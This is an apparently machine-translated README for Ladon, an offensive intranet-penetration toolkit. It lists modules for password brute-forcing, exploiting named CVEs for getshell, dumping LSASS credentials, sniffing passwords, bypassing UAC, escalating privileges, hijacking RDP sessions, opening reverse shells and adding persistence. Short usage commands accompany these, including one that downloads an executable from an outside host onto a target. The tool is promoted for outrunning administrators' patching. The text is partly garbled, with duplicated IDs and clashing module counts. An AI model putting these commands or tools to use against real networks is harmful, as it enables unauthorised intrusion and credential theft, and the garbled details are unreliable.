Ladon is a multi-threaded plug-in comprehensive scanning artifact for large-scale intranet penetration, including port scanning, service identification, network assets, password blasting, high-risk vulnerability detection and one click getshell. It supports batch segment A / segment B / segment C and cross network segment scanning, as well as URL, host and domain name list scanning. Version 10.7 has 194 built-in functional modules
…

Ladon for Windows

Ladon GUI

Ladon for Cobalt Strike

Ladon for PowerShell

Python Ladon

Ladon for Linux

Instructions:

ID	Subject	URL
0	Ladon Document Home Page	https://k8gege.org/Ladon/
1	Ladon basic document	http://k8gege.org/p/648af4b3.html
2	Ladon usage example	http://k8gege.org/Ladon/example-en.html
3	Basic Usage Details	https://github.com/k8gege/Ladon/wiki/Ladon-Usage
4	Cobalt Strike	https://github.com/k8gege/Aggressor
5	Use of Exp generator	https://github.com/k8gege/Ladon/wiki/LadonExp-Usage
6	highly customized plug-in	https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle
7	external module reference	https://github.com/k8gege/K8CScan/wiki
8	PowerLadon	https://github.com/k8gege/powerladon
9	PythonLadon	https://github.com/k8gege/PyLadon
10	LinuxLadon	https://github.com/k8gege/KaliLadon
11	ladongo full platform	https://github.com/k8gege/LadonGo
12	Vulnerability demonstration video	https://github.com/k8gege/K8CScan/tree/master/Video
13	Ladon6.0 function	http://k8gege.org/p/56393.html
14	Ladon6.2 function	http://k8gege.org/p/39070.html
13	Ladon6.4 function	http://k8gege.org/p/55476.html
16	Ladon6.5 function	http://k8gege.org/Ladon/WinShell.html
17	Ladon9.1 Function	http://k8gege.org/Ladon/ladon91.html

Source code compilation

git clone https://github.com/k8gege/Ladon.git

Compile with VS2012 or above Net version 3.5 and 4.0 EXE

Finished product download

https://github.com/k8gege/Ladon/releases

Win7 / 2008 or installation Net 2. x 3. x system can use Ladon.exe

Win8-win10 or install Net 4. x system can use Ladon40.exe

Preface

Whether intranet or internet penetration information collection is very critical, the more information collected, the more accurate the penetration success rate will be.

However, the success rate is also affected by vulnerabilities, which are affected by timeliness. For large intranets, the scanning speed directly affects the success rate.

The timeliness of vulnerabilities is 1-2 days. It takes 1 week to scan the intranet or internet. Will many vulnerabilities be missed or allowed to succeed?

For those big stations with hundreds of thousands of domain names, the faster you find the higher the success rate, and the slower the administrator will patch it.

Therefore, we need a scanner that supports batch C / B and even a segments, and add custom modules to quickly detect new vulnerabilities.

About Ladon

Ladon: bin Laden or radon. Due to the integration of many modules, each module can become a tool independently, which is similar to that of a hundred headed dragon.

Ladon is a mythical animal in Greek mythology, a hundred headed dragon guarding the golden apple. It never sleeps. Heracles lures the dragon to sleep with the hand of the giant carrying the sky

Kill the dragon and steal the golden apple. Before the dragon died, he sealed his soul in the golden apple. The thief gave the golden apple to Snow White

In order to repay the kindness, the Golden Apple was given to seven dwarfs. After eating it, they became dragon balls and scattered around the world. The dragon balls are divided into seven, which contain

The power that can make miracles happen. When you gather 7 dragon beads and pronounce the incantation, you can summon the divine dragon, and the divine dragon will realize a wish put forward by the summoner.

Program introduction

Ladon is a multi-threaded plug-in comprehensive scanning artifact for large-scale network penetration, including port scanning, service identification, network assets, password blasting, high-risk vulnerability detection and one click getshell. It supports batch a segment / b segment / C segment and cross network segment scanning, as well as URL, host and domain name list scanning. The 10.7 version has 194 built-in functional modules and 18 external modules. Through various protocols and methods, it can quickly obtain the target network survival host IP, computer name, workgroup, shared resources, network card address, operating system version, website, subdomain name, middleware, open services, routers, databases and other information. Vulnerability detection includes MS17010, SMBHost, Weblogic, ActiveMQ, Tomcat, Struts2 series, etc, 13 types of password explosion include databases (MySQL, Oracle, MSSQL), FTP, SSH, VNC, Windows (LDAP, SMB/IPC, NBT, WMI, SmbHash, WmiHash, Winrm), BasicAuth, Tomcat, Weblogic, Rar, etc. Remote execution commands include (smbexec/wmiexe/psexec/atexec/ssheexec/jspshell). The Web fingerprint identification module can identify 75 types (Web applications, middleware, script types, page types), and can highly customize plug-in POC support Net assembly, DLL (C # / Delphi / VC), PowerShell and other language plugins, support the batch call of any external program or command by configuring ini, and the exp generator can generate vulnerability POC at one click to quickly expand the scanning ability. Ladon supports the plug-in scanning of cobalt strike to quickly expand the intranet for horizontal movement.

Easy to use

Although Ladon has various functions, it is very simple to use, and anyone can easily use it

90% of the functions can be used with only one or two parameters, and one module is equivalent to a new tool

Operating environment

Windows

Ladon.exe can be installed on the Net 2.0 and above in the Win system (. net comes with the Win7 system)

Such as Cmd, PowerShell, remote control Cmd, WebShell, etc., and Cobalt Strike memory loading

Ladon. Ps1 is perfectly compatible with win7-win10 PowerShell, and can be loaded remotely without looking at the version to achieve file penetration

Full platform ladongo supports Linux, MAC, arm and MIPS

Full platform: Linux, MacOS, windows and other OS

https://github.com/k8gege/LadonGo

Exotic conditions

The actual battle is not so smooth. Some intranet users are too laggy or unable to forward after forwarding, so they can only upload the tool to the target

Some programs that can upload two or three m take half a day or even can’t be transmitted at all, let alone several tens of m in PY

Ladon uses C # for research and development, and the program size is very small, about 500K. Even if the horse can’t, it can upload 500K programs

If you can’t, you can also load from PowerShell remote memory, which is incomparable to large programs compiled by py or go

Purpose

One stop service, providing users with a simple, functional and highly flexible scanning tool

Features

Small scanning flow

Small program size

Rich and powerful functions

The program is simple and easy to use

The plug-in supports multiple languages

Cross platform (win / Kali / Ubuntu), etc

Support Cobalt Strike plug-in

Support PowerShell no file penetration

Exp generator can generate POC in one click

Multi version, applicable to various environments

Program parameter function

1) support specified IP scanning

2 Support specified domain name scanning

3) support scanning of specified machine name

4 support specified C-segment scanning (IP / 24)

5 support specified B-segment scanning (IP / 16)

6 support specified A-segment scanning (IP / 8)

7 Support specified URL scanning

8 Support batch IP scanning (ip. txt)

9 support batch C-segment scanning (ip24. Txt)

10 Support batch B segment scanning (ip16. txt)

11 support batch URL scanning (URL. Txt)

12 support batch domain name scanning (domain. Txt)

13 Support batch machine name scanning (host. txt)

14 support batch country segment scanning (CIDR. Txt)

15 support batch string list (str.txt)

16 support host account secret list (check. Txt)

17 support user password list (userpass. Txt)

18 Support C-segment scanning in specified range

19 Support parameter loading custom DLL (C # only)

20 Support parameter loading custom EXE (C # only)

21 support parameter loading custom ini configuration file

22 support parameter loading custom PowerShell

23 support custom programs (system commands or third-party programs, i.e. programs or scripts developed in any language)

24 plug-in (support multiple languages C # / Delphi / golang / Python / VC / PowerShell)

25 support cobalt strike (scan the target intranet under the beacon command line or scan the target extranet from the springboard)

26 support CIDR format IP scanning, such as 100.64.0.0/10192.168.1.1/20, etc

27 INI configuration supports custom program password explosion

Built in function module (117)

0x001 Asset Scan (11)

Example: Ladon OnlinePC (scan the section C of the current machine, the same for other modules)

Example: Ladon 192.168.1.8/24 OnlinePC

ID	module name	function description	return result
1	[ICMP]( http://k8gege.org/p/55476.html ）	Live host scanning	Live IP (fast detection speed 3-6 seconds/C segment)
2	[OnlinePC]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -%E5% AD% 98% E6% B4% BB% E4% B8% BB% E6% 9C% BA% E6% 89% AB% E6% 8F% 8F)	Survival host scanning	Survival IP, Mac address, machine name, and device manufacturer
3	[OnlineIP]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -%E5% ad% 98% E6% B4% BB% E4% B8% BB% E6% 9C% Ba% E6% 89% AB% E6% 8F% 8F)	only surviving host IP	surviving IP
4	[UrlScan]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -C% E6% AE% B5% E5% 9F% 9F% E5% 90% 8durl% E6% 89% AB% E6% 8F% 8F)	URL domain name scan	server URL (do not verify IP, domain name and web title)
5	[SameWeb]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -C% E6% AE% B5% E6% 97% 81% E7% AB% 99% E5% 9F% 9F% E5% 90% 8D% E6% 89% AB% E6% 8F% 8F)	same server domain name scanning	same server URL (verify IP, domain name, web title)
6	[WebScan]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -Web% E8% B5% 84% E4% BA% A7% E6% 89% AB% E6% 8F% 8F)	Web information scanning	Survival IP, host name, banner, and Web title
7	[WebDir]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -Web% E7% 9B% AE% E5% BD% 95% E6% 89% AB% E6% 8F% 8F)	Background directory scanning	Address, HTTP status
8	[SubDomain]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -%E5% ad% 90% E5% 9F% 9F% E5% 90% 8D% E7% 88% 86% E7% A0% B4)	subdomain name blasting	subdomain name (can be resolved by domainip / hostip)
9	[DomainIP]( https://github.com/k8gege/Ladon/wiki/%E5%AE%9E%E7%94%A8%E5%8A%9F%E8%83%BD -%E6% 89% B9% E9% 87% 8F% E5% 9F% 9F% E5% 90% 8D% E8% A7% A3% E6% 9E% 90)	domain name resolution IP	domain name, IP
10	[HostIP]( https://github.com/k8gege/Ladon/wiki/%E5%AE%9E%E7%94%A8%E5%8A%9F%E8%83%BD -%E6% 89% B9% E9% 87% 8F% E4% B8% BB% E6% 9C% Ba% E5% 90% 8D% E8% A7% A3% E6% 9E% 90)	host name to IP	IP, domain name
11	[AdiDnsDump]( http://k8gege.org/p/39070.html ）	Acquisition of machine information in the domain (please use LdapScan to probe in non domain)	IP, domain name

0x002 fingerprint identification / service identification (17)

Example: Ladon osscan

Example: Ladon 192.168.1.8/24 OsScan

ID	module name	function description	return result
1	[OsScan]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -%E6% 93% 8D% E4% BD% 9C% E7% B3% BB% E7% BB% 9F% E6% 8E% A2% E6% B5% 8B)	OS version detection	Survival IP, workgroup machine name, operating system, open service
2	[PortScan]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -%E7% AB% AF% E5% 8F% A3% E6% 89% AB% E6% 8F% 8F (% E6% 9C% 8D% E5% 8A% A1% E8% AF% 86% E5% 88% AB)	Port scanning includes Banner	Host name, open port, service identification, Banner, Web
3	[WhatCMS]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -Web% E6% 8C% 87% E7% BA% B9% E8% AF% 86% E5% 88% AB)	86 kinds of Web fingerprint identification	URL, CMS, mail system, login page, middleware (such as Apache Tomecat IIS), etc
4	[CiscoScan]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -%E6% 80% 9D% E7% A7% 91% E8% AE% be% E5% A4% 87% E6% 89% AB% E6% 8F% 8F)	Cisco device scan	surviving IP, device model, host name, boot, hardware version
5	[EnumMssql]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -%E6% 9E% 9A% E4% B8% be% E5% 86% 85% E7% BD% 91mssql% E4% B8% BB% E6% 9C% BA)	enumerate MSSQL database hosts	database IP, machine name, SQL version
6	[EnumShare]( https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86 -%E6% 9E% 9A% E4% B8% be% E7% BD% 91% E7% BB% 9C% E5% 85% B1% E4% Ba% AB% E8% B5% 84% E6% Ba% 90)	enumerate network shared resources	domain, surviving IP, shared path
7	[LdapScan]( http://k8gege.org/p/39070.html ）	when no password is specified, only the LDAP server	IP is detected as an LDAP server
8	[FtpScan]( http://k8gege.org/p/39070.html ）	when no password is specified, only detect whether the FTP server	IP is an FTP server
9	[EthScan]( http://k8gege.org/Ladon/ethscan.html ）	OXID multi network card host detection
10	[DnsScan]( http://k8gege.org/Ladon/ladon91.html ）	OXID multi network card host detection
11	[SmbInfo]( http://k8gege.org/Ladon/ntlminfo.html ）	SMB information detection	surviving IP, machine name, win version, domain name, DNS
12	[NbtInfo]( http://k8gege.org/Ladon/ntlminfo.html ）	NBT information detection	surviving IP, machine name, win version, domain name, DNS
13	[WmiInfo]( http://k8gege.org/Ladon/ntlminfo.html ）	WMI information detection	surviving IP, machine name, win version, domain name, DNS
14	[RdpInfo]( http://k8gege.org/Ladon/ntlminfo.html ）	RDP information detection	surviving IP, machine name, win version, domain name, DNS
15	[WinrmInfo]( http://k8gege.org/Ladon/ntlminfo.html ）	Winrm information detection	Survival IP, machine name, Win version, domain name, DNS
16	[MssqlInfo]( http://k8gege.org/Ladon/ntlminfo.html ）	MSSQL information detection	surviving IP, machine name, win version, domain name, DNS
17	[ExchangeInfo]( http://k8gege.org/Ladon/ntlminfo.html ）	Exchange information detection	Survival IP, machine name, Win version, domain name, DNS
18	[ WhatCms]( http://k8gege.org/p/FindExchange.html ）	exchange server probe	live IP, exchange, banner

0x003 Password detection/password explosion (18)

[User defined port (IP: port), account secret detection (user password), host account secret detection (IP port database user password)]

Example: Ladon SshScan

Example: Ladon 192.168.1.8/24 SshScan

Example: Ladon 192.168.1.8:22 SshScan (specify the port)

Example: Ladon test rar RarScan

ID	Module Name	Function Description	Return Result	Dependency
1	[SmbScan]( http://k8gege.org/Ladon/SmbScan.html ）	SMB password explosion (Windows)	Detection process, successful password, LOG file
2	[WmiScan]( http://k8gege.org/Ladon/WmiScan.html ）	Wmi password explosion (Windows)	Detection process, successful password, LOG file
3	[NbtScan]( http://k8gege.org/Ladon/NbtScan.html ）	Ipc password explosion (Windows)	Detection process, successful password, LOG file
4	[LdapScan]( http://k8gege.org/p/56393.html ）	AD domain password explosion (Windows)	Detection process, successful password, LOG file
5	[SmbHashScan]( http://k8gege.org/Ladon/SmbHashScan.html ）	SMB hash password blasting (Windows)	detection process, successful password, log file
6	[WmiHashScan]( http://k8gege.org/Ladon/WmiHashScan.html ）	WMI hash password blasting (Windows)	detection process, successful password, log file
7	[SshScan]( http://k8gege.org/Ladon/sshscan.html ）	SSH password explosion (Linux)	Detection process, successful password, LOG file
8	[MssqlScan]( http://k8gege.org/Ladon/MssqlScan.html ）	MSSQL database password blasting	detection process, successful password, log file
9	[OracleScan]( http://k8gege.org/Ladon/OracleScan.html ）	Oracle database password explosion	detection process, successful password, log file
10	[MysqlScan]( http://k8gege.org/Ladon/MysqlScan.html ）	MySQL database password explosion	Detection process, successful password, LOG file
11	[WeblogicScan]( http://k8gege.org/Ladon/weblogicScan.html ）	Weblogic background password blasting	detection process, successful password, log file
12	[VncScan]( http://k8gege.org/Ladon/VncScan.html ）	VNC remote desktop password blasting	detection process, successful password, log file
13	[FtpScan]( http://k8gege.org/Ladon/ftpscan.html ）	Ftp server password explosion	Detection process, successful password, LOG file
14	[RarScan]( https://github.com/k8gege/Ladon/wiki/%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4 -Rar% E6% 96% 87% E4% BB% B6% E5% AF% 86% E7% A0% 81% E7% A0% B4% E8% A7% A3)	rar compressed package password explosion	detection process, success password, log file	rar.exe
15	[TomcatScan]( http://k8gege.org/Ladon/TomcatScan.html ）	Tomcat background login password blasting	detection process, successful password, log file
16	[HttpBasicScan]( http://k8gege.org/Ladon/HttpbasicScan.html ）	httpbasic401 authentication password blasting	detection process, successful password, log file
17	[WinrmScan]( http://k8gege.org/Ladon/WinrmScan.html ）	winrm authentication password blasting	detection process, successful password, log file
18	[NbtScan]( http://k8gege.org/Ladon/NbtScan.html ）	Netbios password explosion	Detection process, successful password, LOG file
19	[DvrScan]( http://k8gege.org/Ladon/dvrscan.html ）	camera password blasting	detection process, successful password, log file

0x004 vulnerability detection / exploitation (12)

Example: Ladon MS17010

Example: Ladon 192.168.1.8/24 MS17010

Example: Ladon http://192.168.1.8 WeblogicExp

ID	Module name	Function description
1	[MS17010]( https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -Ms17010% E6% BC% 8F% E6% B4% 9E% E6% A3% 80% E6% B5% 8b)	SMB vulnerability detection (cve-2017-0143 / cve-2017-0144 / cve-2017-0145 / cve-2017-0146 / cve-2017-0148)
2	[SMBGhost]( http://k8gege.org/Ladon/example.html ）	SMBHost remote overflow vulnerability detection (CVE-2020-0796)
3	[WeblogicPoc]( https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -CVE-2019-2725 Weblogic GetShell Exploit)	Weblogic vulnerability detection (CVE-2019-2725/[CVE-2018-2894]（ https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -CVE-2018-2894))
4	[PhpStudyPoc]( https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -PhpStudy% E5% 90% 8E% E9% 97% A8% E6% A3% 80% E6% B5% 8B)	PhpStudy Rear Door Detection (phpstudy 2016/phpstudy 2018)
5	[ActivemqPoc]( https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F –Cve-2016-3088)	ActiveMQ vulnerability detection (cve-2016-3088)
6	[TomcatPoc]( https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -CVE-2017-12615)	Tomcat vulnerability detection (CVE-2017-12615)
7	[WeblogicExp]( https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -Cve-2019-2725-weblogic-getshell-exploit)	Weblogic vulnerability exploitation (cve-2019-2725)
8	[TomcatExp]( https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8 -Cve-2017-12615)	Tomcat vulnerability exploitation (cve-2017-12615)
9	[Struts2Poc]( https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -Struts 2% E7% B3% BB% E5% 88% 97% E6% BC% 8F% E6% B4% 9E% E6% A3% 80% E6% B5% 8B)	Struts 2 vulnerability detection (S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)
10	[ZeroLogon]( http://k8gege.org/Ladon/cve-2020-1472.html ）	cve-2020-1472 domain control vulnerability exp
11	[CVE-2020-0688]( http://k8gege.org/Ladon/cve-2020-0688.html ）	CVE-2020-0688 Exchange Serialization Vulnerability Exploitation
12	[CVE-2020-0796]( http://k8gege.org/p/smbghost_cve_2020_0796.html ）	SMBHost Win10 remote vulnerability

0x005 Encryption and decryption (4)

Example: Ladon string enhex

Example: Ladon EnHex (batch str.txt)

ID	Module name	Function description
1	[EnHex]( https://github.com/k8gege/Ladon/wiki/%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86 -%E6% 89% B9% E9% 87% 8FHex% E5% AF% 86% E7% A0% 81)	Batch Hex password encryption
2	[DeHex]( https://github.com/k8gege/Ladon/wiki/%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86 -%E6% 89% B9% E9% 87% 8fhex% E5% AF% 86% E7% A0% 81)	bulk hex password decryption
3	[EnBase64]( https://github.com/k8gege/Ladon/wiki/%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86 -%E6% 89% B9% E9% 87% 8FBase64% E5% AF% 86% E7% A0% 81)	Batch Base64 password encryption
4	[DeBase64]( https://github.com/k8gege/Ladon/wiki/%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86 -%E6% 89% B9% E9% 87% 8FBase64% E5% AF% 86% E7% A0% 81)	Batch Base64 password decryption

####0x006 Download function (2)

The download function is mainly used for intranet file transfer or downloading VPS files to the target machine

ID	Module name	Function description	Usage
1	HttpDownLoad	HTTP Download	Ladon HttpDownLoad http://k8gege.org/test.exe
2	ftpdownload	FTP download	Ladon ftpdownload 127.0.0.1:21 admin admin test.exe

0x007 network sniffing (3)

Based on Socket RAW sniffing, Winpcap does not need to be installed, but administrator permissions are required

It is mainly used to discover the surviving machines in the intranet or sniff the password of the administrator to log in to FTP or web sites

Other functions may be added later, and a special sniffing tool may be written

PS: At present, most sniffing tools on the Internet are based on Winpcap packet capture. Some machines have restrictions on it, and will prompt that the network card cannot be found and cannot be sniffed.

The point is that many programs are either GUI or can only be used under Linux. If you use py’s scapy (WinPcap) to realize discovery, the program can reach 48m

Of course, it can also be used to find the online address of a malicious trojan (for example, the netstat sent by Cobal strike in one minute by default may not be visible)

ID	Module name	Function description	Usage
1	[FtpSniffer/SnifferFtp]( http://k8gege.org/p/56393.html ）	FTP password sniffer	Ladon FTP sniffer 192.168.1.5
2	[HttpSniffer/SnifferHTTP]( http://k8gege.org/p/qqkey.html ）	HTTP password sniffing	Ladon httpsniffer 192.168.1.5
3	[Sniffer]( http://k8gege.org/p/56393.html ）	Network sniffer (source address, target address)	Ladon Sniffer

0x008 password reading (3)

ID	Module name	Function description	Usage
1	[EnumIIS/IisPwd]( http://k8gege.org/p/56393.html ）	IIS site password reading	Ladon EnumIIS or Ladon IisPwd
2	[DumpLsass ]( http://k8gege.org/p/55476.html ）	dumplsass memory password	Ladon dumplsass
3	[web]( http://k8gege.org/Ladon/GetWinAuth.html ）	Capture Win Password

0x009 Information Collection (12)

ID	Module name	Function description	Usage
1	[EnumProcess/ProcessList/tasklist]( http://k8gege.org/p/56393.html ）	Process Details	Ladon EnumProcess or Ladon Tasklist
2	[GetCmdLine/CmdLine]( http://k8gege.org/p/56393.html ）	get command line parameters	Ladon CmdLine or Ladon CmdLine cmd.exe
3	[GetInfo/GetInfo2]( http://k8gege.org/p/56393.html ）	Get basic penetration information	Ladon GetInfo or Ladon GetInfo2
4	GetPipe	View native named pipes	Ladon GetPipe
5	rdlog	view 3389 connection records	Ladon rdlog
6	queryadmin	view administrator group user	Ladon queryadmin
7	[NetVer]( http://k8gege.org/ ）	view the installation Net version	Ladon netver or Ladon netversion
8	[PsVer]( http://k8gege.org/ ）	View PowerShell version	Ladon PsVersion or Ladon PSVersion
9	whoami	View the current user and privileges	Ladon whoami
10	recent	View the files recently accessed by the user	Ladon recent
11	allver	get the list of installed programs	Ladon allver
12	[Usblog]( http://k8gege.org/p/56393.html ）	view USB usage record	Ladon usblog

0x010 Remote execution (8)

ID	Module name	Function description	Usage
1	[WmiExec]( http://k8gege.org/Ladon/WinShell.html ）	135 port execute command	http://k8gege.org/Ladon/WinShell.html
2	[PsExec]( http://k8gege.org/Ladon/WinShell.html ）	445 port execution command	http://k8gege.org/Ladon/WinShell.html
3	[AtExec]( http://k8gege.org/Ladon/WinShell.html ）	445 port execution command	http://k8gege.org/Ladon/WinShell.html
4	[SshExec]( http://k8gege.org/Ladon/WinShell.html ）	22 port execute command	http://k8gege.org/Ladon/WinShell.html
5	[JspShell]( http://k8gege.org/p/ladon_cs_shell.html ）	Jsp executes the command in one sentence	http://k8gege.org/p/ladon_cs_shell.html
6	[WebShell]( http://k8gege.org/Ladon/webshell.html ）	webshell execute command	http://k8gege.org/Ladon/webshell.html
7	WebShell	CVE-2020-17144	http://k8gege.org/p/CVE-2020-17144.html
8	[WinrmExec]( http://k8gege.org/Ladon/WinrmExec.html ）	5895 port execution command	http://k8gege.org/Ladon/WinrmExec.html
9	[SmbExec]( http://k8gege.org/Ladon/SmbExec.html ）	Port 445 HASH execution command	http://k8gege.org/Ladon/SmbExec.html

0x011 Right raising and right lowering (9)

ID	Module name	Function description	Usage
1	[BypassUac]( http://k8gege.org/p/39070.html ）	Bypass UAC execution, support Win7-Win10	Ladon Bypass Uac c: 1.exe or Ladon Bypass Uac c: 1.bat
2	[GetSystem]( http://k8gege.org/p/55476.html ）	run the program	Ladon getsystem CMD Exe or Ladon getsystem CMD exe explorer
3	[Runas]( http://k8gege.org/Ladon/runas.html ）	Simulate the user to execute the command	Ladon Runas user pass cmd
4	[ms16135]( http://k8gege.org/p/55476.html ）	Right to SYSTEM	Ladon ms16135 whoami
5	[BadPotato]( http://k8gege.org/Ladon/potato.html ）	IIS or the service user is authorized to SYSTEM	Ladon BadPotato cmdline
6	[SweetPotato]( http://k8gege.org/Ladon/potato.html ）	IIS or the service user is authorized to SYSTEM	Ladon SweetPotato cmdline
7	[SweetPotato]( http://k8gege.org/Ladon/win2016_lpe_potato_bypass.html ）	Win10/2016 to System	Ladon SweetPotato cmdline
8	[RDPHijack]( http://k8gege.org/Ladon/RdpHijack.html ）	remote desktop session hijacking	Ladon rdphijack sessionid
9	[CVE-2021-1675]( http://k8gege.org/p/CVE-2021-1675.html ）	Printer vulnerability authorization	Ladon CVE-2021-1675 c: evil.dll

0x012 Rebound shell (4)

ID	Module name	Function description	Protocol
1	[netcat]( http://k8gege.org/Ladon/ReverseShell.html ）	Bounce Shell Series Tutorial	TCP
2	[MSF_Shell]( http://k8gege.org/Ladon/ReverseShell.html ）	rebound shell series tutorial	TCP / HTTP / HTTPS
3	[PowerCat]( http://k8gege.org/Ladon/ReverseShell.html ）	rebound shell series tutorial	TCP / UDP / ICMP
4	[MSF_Meter]( http://k8gege.org/Ladon/ReverseShell.html ）	Bounce Shell Series Tutorial	TCP/HTTP/HTTPS
5	[runas]( http://k8gege.org/Ladon/runas.html ）	Runas rebounds shell	TCP

Port forwarding

1 | [PortTran]( http://k8gege.org/Ladon/porttran.html ）| Intranet port forwarding
2 | [netsh]( http://k8gege.org/Ladon/netsh.html ）| System command port forwarding

0x014 other functions (12)

ID	Module name	Function description	Usage
1	[EnableDotNet]( http://k8gege.org/p/39070.html ）	One click enable Net 3.5 (not enabled by default in 2008)	Ladon enabledotnet
2	[gethtml]( http://k8gege.org/p/39070.html ）	get the HTML source code of intranet site	Ladon gethtml http://192.168.1.1
3	[CheckDoor]( http://k8gege.org/p/55476.html ）	detection back door (disclosed online for many years)	Ladon checkdoor or Ladon autorun
4	[GetIP]( http://k8gege.org/ ）	get local intranet IP and external IP	Ladon getip
5	[Open3389]( http://k8gege.org/ ）	one click Open 3389	Ladon open3389
6	[ActiveAdmin]( http://k8gege.org/ ）	Activate the built-in user Administrator	Ladon ActiveAdmin
7	[ActiveGuest]( http://k8gege.org/ ）	activate built-in user guest	Ladon activeguest
8	[RunPS]( http://k8gege.org/ ）	no PowerShell Exe Execute PowerShell script	Ladon RunPS *. ps1
9	regauto	add registry run startup key
10	SC	service plus startup item (system permission)
11	SC	service executor (system authority)
12	at	plan execution program (no time required) (system permission)

Note: The above is only the primary usage of the built-in modules of the tool. Please refer to the usage documentation for external plug-ins or more advanced usage

Intermediate usage: INI file configuration, calling arbitrary programs, system commands, and batch utilization of ready-made exp in various languages

Advanced usage: exp generator generates POC with one click, and uses plug-ins written in various languages to extend Ladon’s scanning ability.

External plug-in module (21)

ID	Function	Implementation language	Function description
1	vulnerability scanning	C language	[CVE 2019-0708 windows RDP 3389 vulnerability batch detection]（ https://github.com/k8gege/K8CScan/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -CVE-2019-0708-Windows-Rdp%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C)
2	Vulnerability exploitation	Exp generator	[ThinkPap5.0.22 5.1.29 RCE GetShell Exploit]（ https://github.com/k8gege/K8CScan/wiki/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8 -ThinkPHP-5.0.22-5.1.29-RCE-GetShell-Exploit)
3	Vulnerability exploitation	Python	[CVE-2019-9621 Zimbra GetShell Exploit]（ https://github.com/k8gege/ZimbraExploit )
4	Vulnerability Exploitation	Python	[CVE-2019-0604 SharePoint GetShell Exploit]（ https://github.com/k8gege/CVE-2019-0604 )
5	Vulnerability exploitation	Exp generator	[CVE 2016-3088 ActiveMQ GetShell Exploit]（ https://github.com/k8gege/K8CScan/wiki/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8 -CVE-2016-3088-ActiveMQ-GetShell-Exploit)
6	Vulnerability Exploitation	Python	[Apache Solr 8.2.0 Velocity RCE 0day Exploit]（ https://github.com/k8gege/SolrExp )
7	Vulnerability Exploitation	Exp Generator	[PhpStudy Backdoor GetShell Exploit]（ https://github.com/k8gege/K8CScan/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -PhpStudy%E5%90%8E%E9%97%A8)
8	Command execution	INI configuration	[INI calls external program commands to batch Linux upper control]（ https://github.com/k8gege/K8CScan/wiki/%E8%B0%83%E7%94%A8%E5%91%BD%E4%BB%A4 -%E6%89%B9%E9%87%8FSSH%E4%B8%8A%E6%8E%A7)
9	command execution	ini configuration	[ini calls external program commands batch windowns upper control]（ https://github.com/k8gege/K8CScan/wiki/%E8%B0%83%E7%94%A8%E5%91%BD%E4%BB%A4 -%E6%89%B9%E9%87%8FWin%E4%B8%8A%E6%8E%A7)
10	vulnerability scanning	Python	[php-fpm Remote Code Execution Vulnerability (cve-2019-11043)]（ https://github.com/k8gege/CVE-2019-11043 )
11	Vulnerability scanning	Exp generator	[Weblogic CVE-2018-2894 vulnerability detection]（ https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -CVE-2018-2894)
12	Vulnerability Exploitation	PowerShell	[MS17010EXP Eternal Blue Vulnerability Exploitation]（ https://github.com/k8gege/MS17010EXP )
13	script call	PowerShell	[Kali 2019 no PowerShell execution script]（ http://k8gege.org/p/32e1a912.html )
14	password scanning	ini configuration	[IPC password blasting of ipcscan.ini ini plug-in]（ http://k8gege.org/p/55476.html )
15	Password scanning	INI configuration	[Smb password explosion of smbscan.ini INI plug-in]（ http://k8gege.org/p/55476.html )
16	password scanning	ini configuration	[ntlmhash blasting of smbhash.ini ini ini plug-in]（ http://k8gege.org/p/55476.html )
